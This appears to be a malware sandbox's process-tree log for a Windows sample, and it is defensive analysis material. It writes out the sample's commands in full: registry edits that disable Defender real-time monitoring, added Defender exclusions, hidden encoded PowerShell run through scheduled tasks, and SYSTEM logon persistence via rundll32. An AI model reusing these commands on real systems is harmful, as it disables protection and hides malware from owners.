C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:2628
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gorTIGEYU" /SC once /ST 04:18:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gorTIGEYU"2⤵
- System Location Discovery: System Language Discovery
PID:2872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gorTIGEYU"2⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:322⤵PID:2464
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- Modifies Windows Defender Real-time Protection settings
PID:284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:642⤵
- System Location Discovery: System Language Discovery
PID:1284 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- Modifies Windows Defender Real-time Protection settings
PID:1688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpxHGJqtY" /SC once /ST 10:35:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpxHGJqtY"2⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpxHGJqtY"2⤵
- System Location Discovery: System Language Discovery
PID:600
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"2⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2320 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True3⤵PID:1904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:322⤵
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:642⤵PID:1080
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:322⤵PID:3064
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:323⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:642⤵PID:2576
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:643⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\YIXdnjwIixpMFthL\FNJJDCvD\QpWreiYGzIDLTOYE.wsf"2⤵PID:2184
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\YIXdnjwIixpMFthL\FNJJDCvD\QpWreiYGzIDLTOYE.wsf"2⤵
- System Location Discovery: System Language Discovery
PID:2580 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:2308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
PID:2840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:2656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
PID:2924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:2648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:323⤵PID:2416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:643⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:643⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:323⤵PID:2964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:643⤵PID:284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:323⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:643⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:323⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:643⤵PID:2300
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGcfaOYOL" /SC once /ST 09:02:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGcfaOYOL"2⤵PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGcfaOYOL"2⤵
- System Location Discovery: System Language Discovery
PID:2176
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:322⤵PID:2196
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:642⤵
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2292
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzTTGfRHhsSQnOLDY"2⤵
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY"2⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzTTGfRHhsSQnOLDY2"2⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY2"2⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FWbuSwfZFsgwoXKWz"2⤵PID:2932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz"2⤵PID:3040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FWbuSwfZFsgwoXKWz2"2⤵PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz2"2⤵PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QARjdqhHkeUSJySsU"2⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QARjdqhHkeUSJySsU"2⤵PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QARjdqhHkeUSJySsU2"2⤵
- System Location Discovery: System Language Discovery
PID:2936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QARjdqhHkeUSJySsU2"2⤵PID:2496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fQYKPzMybePlvBGQCyc"2⤵PID:2800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc"2⤵PID:1228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fQYKPzMybePlvBGQCyc2"2⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc2"2⤵PID:1088
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FIPQnGcqMxrFEWDuliU"2⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU"2⤵
- System Location Discovery: System Language Discovery
PID:932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FIPQnGcqMxrFEWDuliU2"2⤵
- System Location Discovery: System Language Discovery
PID:2052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU2"2⤵PID:2092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YIKgGKXxRbHNIaIyYyL"2⤵
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL"2⤵PID:2416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YIKgGKXxRbHNIaIyYyL2"2⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL2"2⤵PID:2732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YjQMAHbWU\tahjDA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "GqmqubHZBeiIxpo" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OQOjSEtbMvvyYjD"2⤵PID:2964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OQOjSEtbMvvyYjD"2⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OQOjSEtbMvvyYjD2"2⤵
- System Location Discovery: System Language Discovery
PID:2172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OQOjSEtbMvvyYjD2"2⤵PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FKVxFcymEbpqvaq"2⤵PID:2812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FKVxFcymEbpqvaq"2⤵
- System Location Discovery: System Language Discovery
PID:540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FKVxFcymEbpqvaq2"2⤵PID:2276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FKVxFcymEbpqvaq2"2⤵PID:3036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rOGhtOyMLHtWlf"2⤵
- System Location Discovery: System Language Discovery
PID:2164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rOGhtOyMLHtWlf"2⤵
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "geJJKyFMaGRjIf"2⤵PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geJJKyFMaGRjIf"2⤵PID:2336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iSixUSrJJvCYJ"2⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iSixUSrJJvCYJ"2⤵PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iSixUSrJJvCYJ2"2⤵PID:2356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iSixUSrJJvCYJ2"2⤵
- System Location Discovery: System Language Discovery
PID:1044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vZzcwClkycEgo"2⤵
- System Location Discovery: System Language Discovery
PID:268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vZzcwClkycEgo"2⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vZzcwClkycEgo2"2⤵PID:600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vZzcwClkycEgo2"2⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GqmqubHZBeiIxpo2" /F /xml "C:\Program Files (x86)\YjQMAHbWU\UvHLSvA.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GqmqubHZBeiIxpo"2⤵PID:2240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GqmqubHZBeiIxpo"2⤵
- System Location Discovery: System Language Discovery
PID:928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xVzozZXYwkkdWg" /F /xml "C:\Program Files (x86)\CMKMbRFSZeNU2\FswNVpR.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AGouOwHOLlnps2" /F /xml "C:\ProgramData\UQYVlFmkpVlhWwVB\hUZKLbj.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QARjdqhHkeUSJySsU2" /F /xml "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\fQKBjnt.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YIKgGKXxRbHNIaIyYyL2" /F /xml "C:\Program Files (x86)\JXqrxIFSrhCmC\bNBPzON.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 2682⤵
- Program crash
PID:2220
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:108
-
C:\Windows\system32\taskeng.exetaskeng.exe {8DE40DAF-A971-4820-BE34-E128129F0FFD} S-1-5-21-457978338-2990298471-2379561640-1000:WOUOSVRD\Admin:Interactive:[1]1⤵PID:2056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
